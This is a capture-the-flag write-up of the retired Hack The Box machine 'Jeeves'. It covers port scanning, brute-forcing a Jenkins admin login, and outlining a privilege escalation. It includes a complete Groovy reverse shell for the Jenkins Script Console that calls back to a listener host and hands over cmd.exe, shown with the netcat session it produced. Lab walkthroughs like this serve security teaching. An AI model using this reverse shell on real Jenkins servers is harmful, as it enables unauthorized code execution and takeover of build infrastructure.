Good day all
Below is a system we hacked from beginning to end, leaving out the privilege escalation used to root the box. We want to make sure we do not make this too easy for the noobs still learning. Note that this was a Windows machine on Hack The Box, done in a lab, and the machine has since been retired.
root@Skullack:~# nmap -sV 10.10.10.63 -p- --reason
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-10 21:43 SAST
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.19s latency).
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Using curl to view the response headers and source of the page on port 80:
root@Skullack:~# curl -i http://10.10.10.63
HTTP/1.1 200 OK
Last-Modified: Mon, 06 Nov 2017 02:34:40 GMT
Date: Tue, 10 Apr 2018 22:54:37 GMT
Port 50000 (the Jetty service in the nmap output) showed us the login page of the web application:
WHAT IS JENKINS
Jenkins is an open source automation server written in Java. It automates the non-human part of the software development process, with continuous integration and support for the technical side of continuous delivery. It is a server-based system that runs in a servlet container such as Apache Tomcat; here it runs under its own embedded Jetty container, which is what nmap fingerprinted on port 50000.
We brute forced the admin login on the web interface and we were in. Going through the settings we noticed the Script Console, which executes Groovy scripts on the Jenkins server itself (not JavaScript in the browser). Anyone who can reach that console can run arbitrary code with the privileges of the Jenkins process, so we built a reverse shell script and started a netcat listener to catch the connection back to our attacking system.
Script used: (shown in a screenshot in the original post)
Starting a netcat listener on port 8044 and running the script. Below you can see we are logged in to the server running Jenkins by means of a malicious Groovy script.
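As an added example, not the script from the original post's screenshot: a Groovy reverse shell of the kind that is pasted into Manage Jenkins > Script Console. The listener address 10.10.14.48 and port 8044 are taken from the netcat session below; spawning cmd.exe is an assumption that matches the Windows banner the listener received.

```groovy
// Groovy reverse shell for the Jenkins Script Console (added example).
// Runs on the Jenkins controller with the privileges of the Jenkins process.
String host = "10.10.14.48"   // attacker IP from the netcat session (assumed)
int port = 8044               // port the netcat listener is bound to
String cmd = "cmd.exe"        // assumed: Windows target, so spawn cmd.exe

// Start the shell process and merge stderr into stdout so nothing is lost.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start()

// Connect back to the listener; the socket becomes the shell's terminal.
Socket s = new Socket(host, port)
InputStream  pi = p.getInputStream()    // shell output
InputStream  si = s.getInputStream()    // attacker keystrokes
OutputStream po = p.getOutputStream()   // shell input
OutputStream so = s.getOutputStream()   // data sent to attacker

// Pump bytes in both directions until the socket closes or cmd.exe exits.
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read())
    while (si.available() > 0) po.write(si.read())
    so.flush()
    po.flush()
    Thread.sleep(50)
    try {
        p.exitValue()   // throws while the process is still running
        break
    } catch (IllegalThreadStateException e) {
        // shell still alive, keep pumping
    }
}
p.destroy()
s.close()
```

Defensive note: the Script Console is a documented administrative feature, not a bug. The only effective control is keeping Administer permission (and therefore /script and /scriptText) off accounts that can be brute forced, and treating every successful POST to those endpoints in the access log as code execution on the controller.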
root@Skullack:~# nc -nlvp 8044
listening on [any] 8044 …
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.63] 49723
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\Administrator\.jenkins
04/10/2018 11:06 PM <DIR> .
04/10/2018 11:06 PM <DIR> ..
04/10/2018 10:07 PM 48 .owner
04/10/2018 08:43 PM 1,684 config.xml
04/10/2018 11:06 PM 1,353 credentials.xml
04/10/2018 08:43 PM 156 hudson.model.UpdateCenter.xml
11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
11/03/2017 10:33 PM 1,712 identity.key.enc
11/03/2017 10:46 PM 94 jenkins.CLI.xml
04/10/2018 11:06 PM 148,268 jenkins.err.log
11/03/2017 10:47 PM 360,448 jenkins.exe
11/03/2017 10:47 PM 331 jenkins.exe.config
04/10/2018 08:43 PM 4 jenkins.install.InstallUtil.lastExecVersion
11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
12/24/2017 03:38 PM 2,688 jenkins.out.log
04/10/2018 08:42 PM 4 jenkins.pid
11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
11/03/2017 10:47 PM 74,271,222 jenkins.war
04/10/2018 08:42 PM 34,147 jenkins.wrapper.log
11/03/2017 10:49 PM 2,881 jenkins.xml
04/10/2018 11:10 PM <DIR> jobs
11/03/2017 10:33 PM <DIR> logs
04/10/2018 08:43 PM 907 nodeMonitors.xml
11/03/2017 10:33 PM <DIR> nodes
11/03/2017 10:44 PM <DIR> plugins
11/03/2017 10:47 PM 129 queue.xml.bak
11/03/2017 10:33 PM 64 secret.key
11/03/2017 10:33 PM 0 secret.key.not-so-secret
04/10/2018 09:23 PM <DIR> secrets
04/10/2018 09:03 PM 62 test.bat
04/10/2018 09:12 PM 76 test.ftp
11/08/2017 09:52 AM <DIR> updates
04/10/2018 10:59 PM <DIR> userContent
11/03/2017 10:33 PM <DIR> users
11/03/2017 10:47 PM <DIR> war
11/03/2017 10:43 PM <DIR> workflow-libs
04/10/2018 08:49 PM <DIR> workspace
26 File(s) 74,827,125 bytes
13 Dir(s) 6,945,353,728 bytes free
Searching for hidden files and alternate data streams on the system. Why? Administrators and users sometimes stash files this way, and a plain dir will never show an NTFS alternate data stream; /A:H lists hidden entries and /R lists the streams attached to each file.
Command = dir /A:H /R
The Windows privilege escalation came down to finding alternate data streams and then cracking a KeePass 2 database, which contained a long salted hash.
We cracked the hash and were presented with the password. Pass the hash, a technique that is supposedly long dead (it is NOT), then worked flawlessly.
Finding alternate data streams again with dir /R revealed a hidden text file. We read it, and there we had it: we owned the system.
Since we still have new hackers, or noobs, learning how to do this, I have decided not to include the full privilege escalation technique used to get root on this system. (Sorry noobs, but the answer is staring you in the face.)
Hope you enjoyed this post and perhaps learned something from it.
Till next time.
Gerhard De Villiers-Mohr – Senior Ethical Hacker – Secure ICT.